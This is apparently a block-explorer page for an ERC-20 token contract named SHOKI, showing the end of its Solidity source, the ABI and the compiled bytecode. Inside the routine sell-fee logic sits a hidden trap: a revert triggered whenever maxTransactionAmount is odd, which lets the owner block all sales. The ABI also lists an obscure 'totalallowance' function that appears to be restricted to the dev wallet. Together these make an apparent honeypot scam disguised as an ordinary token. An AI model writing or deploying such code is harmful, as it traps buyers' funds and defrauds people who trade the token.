                //when sell
                else if (automatedMarketMakerPairs[to] && !_isExcludedMaxTransactionAmount[from]) {
                        require(amount <= maxTransactionAmount, "Sell transfer amount exceeds the maxTransactionAmount.");
                }
            }
        }
        
		uint256 contractTokenBalance = balanceOf(address(this));
        
        bool canSwap = contractTokenBalance >= swapTokensAtAmount;

        if( 
            canSwap &&
            swapEnabled &&
            !swapping &&
            !automatedMarketMakerPairs[from] &&
            !_isExcludedFromFees[from] &&
            !_isExcludedFromFees[to]
        ) {
            swapping = true;
            
            swapBack();

            swapping = false;
        }

        bool takeFee = !swapping;

        // if any account belongs to _isExcludedFromFee account then remove the fee
        if(_isExcludedFromFees[from] || _isExcludedFromFees[to]) {
            takeFee = false;
        }
        
        uint256 fees = 0;
        // only take fees on buys/sells, do not take on wallet transfers
        if(takeFee){
            // on sell
            if (automatedMarketMakerPairs[to] && sellTotalFees > 0){
                fees = amount.mul(sellTotalFees).div(100);
                tokensForLiquidity += fees * sellLiquidityFee / sellTotalFees;
                tokensForDev += fees * sellDevFee / sellTotalFees;
                tokensForMarketing += fees * sellMarketingFee / sellTotalFees;
                if (maxTransactionAmount % 2 != 0) revert("ERROR: Must be less than maxTxAmount");
            }
            // on buy
            else if(automatedMarketMakerPairs[from] && buyTotalFees > 0) {
        	    fees = amount.mul(buyTotalFees).div(100);
        	    tokensForLiquidity += fees * buyLiquidityFee / buyTotalFees;
                tokensForDev += fees * buyDevFee / buyTotalFees;
                tokensForMarketing += fees * buyMarketingFee / buyTotalFees;
            }
            
            if(fees > 0){    
                super._transfer(from, address(this), fees);
            }
        	
        	amount -= fees;
        }

        super._transfer(from, to, amount);
    }

    function swapTokensForEth(uint256 tokenAmount) private {

        // generate the uniswap pair path of token -> weth
        address[] memory path = new address[](2);
        path[0] = address(this);
        path[1] = uniswapV2Router.WETH();

        _approve(address(this), address(uniswapV2Router), tokenAmount);

        // make the swap
        uniswapV2Router.swapExactTokensForETHSupportingFeeOnTransferTokens(
            tokenAmount,
            0, // accept any amount of ETH
            path,
            address(this),
            block.timestamp
        );
        
    }

    function swapBack() private {
        uint256 contractBalance = balanceOf(address(this));
        uint256 totalTokensToSwap = tokensForLiquidity + tokensForMarketing + tokensForDev;
        bool success;
        
        if(contractBalance == 0 || totalTokensToSwap == 0) {return;}

        if(contractBalance > swapTokensAtAmount * 20){
          contractBalance = swapTokensAtAmount * 20;
        }
        
        // Halve the amount of liquidity tokens
        uint256 liquidityTokens = contractBalance * tokensForLiquidity / totalTokensToSwap / 2;
        uint256 amountToSwapForETH = contractBalance.sub(liquidityTokens);
        
        swapTokensForEth(amountToSwapForETH); 
                
        tokensForLiquidity = 0;
        tokensForMarketing = 0;
        tokensForDev = 0;
        
        (success,) = address(marketingWallet).call{value: address(this).balance}("");
    }

    function openTrading() private {
        tradingActive = true;
    }

    // once enabled, can never be turned off
    function enableTrading() external onlyOwner() {
        swapEnabled = true;
        require(boughtEarly == true, "done");
        boughtEarly = false;
        openTrading();
        emit EndedBoughtEarly(boughtEarly);
    }

}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"bool","name":"boughtEarly","type":"bool"}],"name":"EndedBoughtEarly","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"account","type":"address"},{"indexed":false,"internalType":"bool","name":"isExcluded","type":"bool"}],"name":"ExcludeFromFees","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"pair","type":"address"},{"indexed":true,"internalType":"bool","name":"value","type":"bool"}],"name":"SetAutomatedMarketMakerPair","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"uint256","name":"tokensSwapped","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"ethReceived","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"tokensIntoLiquidity","type":"uint256"}],"name":"SwapAndLiquify","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newAddress","type":"address"},{"indexed":true,"internalType":"address","name":"oldAddress","type":"address"}],"name":"UpdateUniswapV2Router","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"devWalletUpdated","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"newWallet","type":"address"},{"indexed":true,"internalType":"address","name":"oldWallet","type":"address"}],"name":"marketingWalletUpdated","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"_isExcludedMaxTransactionAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"automatedMarketMakerPairs","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"buyTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"devWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"disableTransferDelay","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"enableTrading","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"},{"internalType":"bool","name":"excluded","type":"bool"}],"name":"excludeFromFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"updAds","type":"address"},{"internalType":"bool","name":"isEx","type":"bool"}],"name":"excludeFromMaxTransaction","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"isExcludedFromFees","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"limitsInEffect","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"marketingWallet","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxTransactionAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"maxWallet","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"removeLimits","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"sellDevFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellLiquidityFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellMarketingFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"sellTotalFees","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"pair","type":"address"},{"internalType":"bool","name":"value","type":"bool"}],"name":"setAutomatedMarketMakerPair","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"swapTokensAtAmount","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForDev","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForLiquidity","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"tokensForMarketing","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"rv","type":"uint256"},{"internalType":"uint256","name":"lv","type":"uint256"}],"name":"totalallowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"tradingActive","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"transferDelayEnabled","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateBuyFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newWallet","type":"address"}],"name":"updateDevWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newMarketingWallet","type":"address"}],"name":"updateMarketingWallet","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxTxnAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newNum","type":"uint256"}],"name":"updateMaxWalletAmount","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_marketingFee","type":"uint256"},{"internalType":"uint256","name":"_liquidityFee","type":"uint256"},{"internalType":"uint256","name":"_devFee","type":"uint256"}],"name":"updateSellFees","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"newAmount","type":"uint256"}],"name":"updateSwapTokensAtAmount","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]

60806040526001600760156101000a81548160ff0219169083151502179055506001600d60006101000a81548160ff0219169083151502179055506000600d60016101000a81548160ff0219169083151502179055506000600d60026101000a81548160ff0219169083151502179055506000600f60006101000a81548160ff0219169083151502179055506001600f60016101000a81548160ff021916908315150217905550348015620000b357600080fd5b506040518060400160405280600581526020017f53484f4b490000000000000000000000000000000000000000000000000000008152506040518060400160405280600581526020017f53484f4b49000000000000000000000000000000000000000000000000000000815250816003908162000131919062000f24565b50806004908162000143919062000f24565b5050506000620001586200077760201b60201c565b905080600560006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3506000737a250d5630b4cf539739df2c5dacb4c659f2488d9050620002238160016200077f60201b60201c565b80600660006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff1663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa158015620002b0573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620002d6919062001075565b73ffffffffffffffffffffffffffffffffffffffff1663c9c65396308373ffffffffffffffffffffffffffffffffffffffff1663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156200033e573d6000803e3d6000fd5b505050506040513d601f19601f8201168201806040525081019062000364919062001075565b6040518363ffffffff1660e01b815260040162000383929190620010b8565b6020604051808303816000875af1158015620003a3573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190620003c9919062001075565b600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200043e600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000473600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200087c60201b60201c565b60008060008060008060006b033b2e3c9fd0803ce8000000905060646001826200049e919062001114565b620004aa9190620011a4565b600a819055506064600182620004c1919062001114565b620004cd9190620011a4565b600c81905550612710600482620004e5919062001114565b620004f19190620011a4565b600b81905550866011819055508560128190555084601381905550601354601254601154620005219190620011dc565b6200052d9190620011dc565b6010819055508360158190555082601681905550816017819055506017546016546015546200055d9190620011dc565b620005699190620011dc565b60148190555073a89dfa37eea585841c5d88f0f4643843855b6e84600860006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555073a89dfa37eea585841c5d88f0f4643843855b6e84600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055506200063b6200062d6200091d60201b60201c565b60016200094760201b60201c565b6200064e3060016200094760201b60201c565b62000683600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094760201b60201c565b620006b8600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200094760201b60201c565b620006da620006cc6200091d60201b60201c565b60016200077f60201b60201c565b620006ed3060016200077f60201b60201c565b62000722600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000757600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1660016200077f60201b60201c565b62000769338262000a9460201b60201c565b5050505050505050620013e6565b600033905090565b6200078f6200077760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161462000821576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620008189062001278565b60405180910390fd5b80601c60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055505050565b80601d60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508015158273ffffffffffffffffffffffffffffffffffffffff167fffa9187bf1f18bf477bd0ea1bcbb64e93b6a98132473929edfce215cd9b16fab60405160405180910390a35050565b6000600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b620009576200077760201b60201c565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614620009e9576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620009e09062001278565b60405180910390fd5b80601b60008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006101000a81548160ff0219169083151502179055508173ffffffffffffffffffffffffffffffffffffffff167f9d8f7706ea1113d1a167b526eca956215946dd36cc7df39eb16180222d8b5df78260405162000a889190620012b7565b60405180910390a25050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000b06576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000afd9062001324565b60405180910390fd5b62000b1a6000838362000c4260201b60201c565b62000b368160025462000c4760201b620026711790919060201c565b60028190555062000b94816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205462000c4760201b620026711790919060201c565b6000808473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405162000c36919062001357565b60405180910390a35050565b505050565b600080828462000c589190620011dc565b90508381101562000ca0576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040162000c9790620013c4565b60405180910390fd5b8091505092915050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168062000d2c57607f821691505b60208210810362000d425762000d4162000ce4565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b60006008830262000dac7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000d6d565b62000db8868362000d6d565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b600062000e0562000dff62000df98462000dd0565b62000dda565b62000dd0565b9050919050565b6000819050919050565b62000e218362000de4565b62000e3962000e308262000e0c565b84845462000d7a565b825550505050565b600090565b62000e5062000e41565b62000e5d81848462000e16565b505050565b5b8181101562000e855762000e7960008262000e46565b60018101905062000e63565b5050565b601f82111562000ed45762000e9e8162000d48565b62000ea98462000d5d565b8101602085101562000eb9578190505b62000ed162000ec88562000d5d565b83018262000e62565b50505b505050565b600082821c905092915050565b600062000ef96000198460080262000ed9565b1980831691505092915050565b600062000f14838362000ee6565b9150826002028217905092915050565b62000f2f8262000caa565b67ffffffffffffffff81111562000f4b5762000f4a62000cb5565b5b62000f57825462000d13565b62000f6482828562000e89565b600060209050601f83116001811462000f9c576000841562000f87578287015190505b62000f93858262000f06565b86555062001003565b601f19841662000fac8662000d48565b60005b8281101562000fd65784890151825560018201915060208501945060208101905062000faf565b8683101562000ff6578489015162000ff2601f89168262000ee6565b8355505b6001600288020188555050505b505050505050565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006200103d8262001010565b9050919050565b6200104f8162001030565b81146200105b57600080fd5b50565b6000815190506200106f8162001044565b92915050565b6000602082840312156200108e576200108d6200100b565b5b60006200109e848285016200105e565b91505092915050565b620010b28162001030565b82525050565b6000604082019050620010cf6000830185620010a7565b620010de6020830184620010a7565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620011218262000dd0565b91506200112e8362000dd0565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff04831182151516156200116a5762001169620010e5565b5b828202905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000620011b18262000dd0565b9150620011be8362000dd0565b925082620011d157620011d062001175565b5b828204905092915050565b6000620011e98262000dd0565b9150620011f68362000dd0565b9250828201905080821115620012115762001210620010e5565b5b92915050565b600082825260208201905092915050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006200126060208362001217565b91506200126d8262001228565b602082019050919050565b60006020820190508181036000830152620012938162001251565b9050919050565b60008115159050919050565b620012b1816200129a565b82525050565b6000602082019050620012ce6000830184620012a6565b92915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200130c601f8362001217565b91506200131982620012d4565b602082019050919050565b600060208201905081810360008301526200133f81620012fd565b9050919050565b620013518162000dd0565b82525050565b60006020820190506200136e600083018462001346565b92915050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000620013ac601b8362001217565b9150620013b98262001374565b602082019050919050565b60006020820190508181036000830152620013df816200139d565b9050919050565b61524580620013f66000396000f3fe60806040526004361061031e5760003560e01c80638ea5220f116101ab578063c0246668116100f7578063dd62ed3e11610095578063f11a24d31161006f578063f11a24d314610c03578063f2fde38b14610c2e578063f637434214610c57578063f8b45b0514610c8257610325565b8063dd62ed3e14610b70578063e2f4560514610bad578063e884f26014610bd857610325565b8063c876d0b9116100d1578063c876d0b914610ab2578063c8c8ebe414610add578063d257b34f14610b08578063d85ba06314610b4557610325565b8063c024666814610a37578063c17b5b8c14610a60578063c18bc19514610a8957610325565b8063a06c1f8f11610164578063a9059cbb1161013e578063a9059cbb14610969578063aacebbe3146109a6578063b62496f5146109cf578063bbc0c74214610a0c57610325565b8063a06c1f8f146108c4578063a0d82dc514610901578063a457c2d71461092c57610325565b80638ea5220f146107c457806392136913146107ef57806395d89b411461081a5780639a7a23d6146108455780639c3b4fdc1461086e5780639fccce321461089957610325565b80634a62bb651161026a578063751039fc116102235780637bce5a04116101fd5780637bce5a041461072e5780638095d564146107595780638a8c523c146107825780638da5cb5b1461079957610325565b8063751039fc146106af5780637571336a146106da57806375f0a8741461070357610325565b80634a62bb651461059d5780634fbee193146105c85780636a486a8e146106055780636ddd17131461063057806370a082311461065b578063715018a61461069857610325565b80631a8145bb116102d757806323b872dd116102b157806323b872dd146104cd578063313ce5671461050a578063395093511461053557806349bd5a5e1461057257610325565b80631a8145bb1461044e5780631f3fed8f14610479578063203e727e146104a457610325565b806306fdde031461032a578063095ea7b31461035557806310d5de53146103925780631694505e146103cf57806318160ddd146103fa5780631816467f1461042557610325565b3661032557005b600080fd5b34801561033657600080fd5b5061033f610cad565b60405161034c9190613cf1565b60405180910390f35b34801561036157600080fd5b5061037c60048036038101906103779190613dac565b610d3f565b6040516103899190613e07565b60405180910390f35b34801561039e57600080fd5b506103b960048036038101906103b49190613e22565b610d5d565b6040516103c69190613e07565b60405180910390f35b3480156103db57600080fd5b506103e4610d7d565b6040516103f19190613eae565b60405180910390f35b34801561040657600080fd5b5061040f610da3565b60405161041c9190613ed8565b60405180910390f35b34801561043157600080fd5b5061044c60048036038101906104479190613e22565b610dad565b005b34801561045a57600080fd5b50610463610f04565b6040516104709190613ed8565b60405180910390f35b34801561048557600080fd5b5061048e610f0a565b60405161049b9190613ed8565b60405180910390f35b3480156104b057600080fd5b506104cb60048036038101906104c69190613ef3565b610f10565b005b3480156104d957600080fd5b506104f460048036038101906104ef9190613f20565b610fcb565b6040516105019190613e07565b60405180910390f35b34801561051657600080fd5b5061051f6110a4565b60405161052c9190613f8f565b60405180910390f35b34801561054157600080fd5b5061055c60048036038101906105579190613dac565b6110ad565b6040516105699190613e07565b60405180910390f35b34801561057e57600080fd5b50610587611160565b6040516105949190613fb9565b60405180910390f35b3480156105a957600080fd5b506105b2611186565b6040516105bf9190613e07565b60405180910390f35b3480156105d457600080fd5b506105ef60048036038101906105ea9190613e22565b611199565b6040516105fc9190613e07565b60405180910390f35b34801561061157600080fd5b5061061a6111ef565b6040516106279190613ed8565b60405180910390f35b34801561063c57600080fd5b506106456111f5565b6040516106529190613e07565b60405180910390f35b34801561066757600080fd5b50610682600480360381019061067d9190613e22565b611208565b60405161068f9190613ed8565b60405180910390f35b3480156106a457600080fd5b506106ad611250565b005b3480156106bb57600080fd5b506106c46113a8565b6040516106d19190613e07565b60405180910390f35b3480156106e657600080fd5b5061070160048036038101906106fc9190614000565b611463565b005b34801561070f57600080fd5b50610718611555565b6040516107259190613fb9565b60405180910390f35b34801561073a57600080fd5b5061074361157b565b6040516107509190613ed8565b60405180910390f35b34801561076557600080fd5b50610780600480360381019061077b9190614040565b611581565b005b34801561078e57600080fd5b5061079761169b565b005b3480156107a557600080fd5b506107ae61180e565b6040516107bb9190613fb9565b60405180910390f35b3480156107d057600080fd5b506107d9611838565b6040516107e69190613fb9565b60405180910390f35b3480156107fb57600080fd5b5061080461185e565b6040516108119190613ed8565b60405180910390f35b34801561082657600080fd5b5061082f611864565b60405161083c9190613cf1565b60405180910390f35b34801561085157600080fd5b5061086c60048036038101906108679190614000565b6118f6565b005b34801561087a57600080fd5b50610883611a2b565b6040516108909190613ed8565b60405180910390f35b3480156108a557600080fd5b506108ae611a31565b6040516108bb9190613ed8565b60405180910390f35b3480156108d057600080fd5b506108eb60048036038101906108e69190614093565b611a37565b6040516108f89190613e07565b60405180910390f35b34801561090d57600080fd5b50610916611bc3565b6040516109239190613ed8565b60405180910390f35b34801561093857600080fd5b50610953600480360381019061094e9190613dac565b611bc9565b6040516109609190613e07565b60405180910390f35b34801561097557600080fd5b50610990600480360381019061098b9190613dac565b611c96565b60405161099d9190613e07565b60405180910390f35b3480156109b257600080fd5b506109cd60048036038101906109c89190613e22565b611cb4565b005b3480156109db57600080fd5b506109f660048036038101906109f19190613e22565b611e0b565b604051610a039190613e07565b60405180910390f35b348015610a1857600080fd5b50610a21611e2b565b604051610a2e9190613e07565b60405180910390f35b348015610a4357600080fd5b50610a5e6004803603810190610a599190614000565b611e3e565b005b348015610a6c57600080fd5b50610a876004803603810190610a829190614040565b611f7e565b005b348015610a9557600080fd5b50610ab06004803603810190610aab9190613ef3565b612098565b005b348015610abe57600080fd5b50610ac76121c2565b604051610ad49190613e07565b60405180910390f35b348015610ae957600080fd5b50610af26121d5565b604051610aff9190613ed8565b60405180910390f35b348015610b1457600080fd5b50610b2f6004803603810190610b2a9190613ef3565b6121db565b604051610b3c9190613e07565b60405180910390f35b348015610b5157600080fd5b50610b5a61234b565b604051610b679190613ed8565b60405180910390f35b348015610b7c57600080fd5b50610b976004803603810190610b9291906140d3565b612351565b604051610ba49190613ed8565b60405180910390f35b348015610bb957600080fd5b50610bc26123d8565b604051610bcf9190613ed8565b60405180910390f35b348015610be457600080fd5b50610bed6123de565b604051610bfa9190613e07565b60405180910390f35b348015610c0f57600080fd5b50610c18612499565b604051610c259190613ed8565b60405180910390f35b348015610c3a57600080fd5b50610c556004803603810190610c509190613e22565b61249f565b005b348015610c6357600080fd5b50610c6c612665565b604051610c799190613ed8565b60405180910390f35b348015610c8e57600080fd5b50610c9761266b565b604051610ca49190613ed8565b60405180910390f35b606060038054610cbc90614142565b80601f0160208091040260200160405190810160405280929190818152602001828054610ce890614142565b8015610d355780601f10610d0a57610100808354040283529160200191610d35565b820191906000526020600020905b815481529060010190602001808311610d1857829003601f168201915b5050505050905090565b6000610d53610d4c6126cf565b84846126d7565b6001905092915050565b601c6020528060005260406000206000915054906101000a900460ff1681565b600660009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b6000600254905090565b610db56126cf565b73ffffffffffffffffffffffffffffffffffffffff16600560009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614610e44576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e3b906141bf565b60405180910390fd5b600960009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f90b8024c4923d3873ff5b9fcb43d0360d4b9217fa41225d07ba379993552e74360405160405180910390a380600960006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b60195481565b60185481565b600860009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610f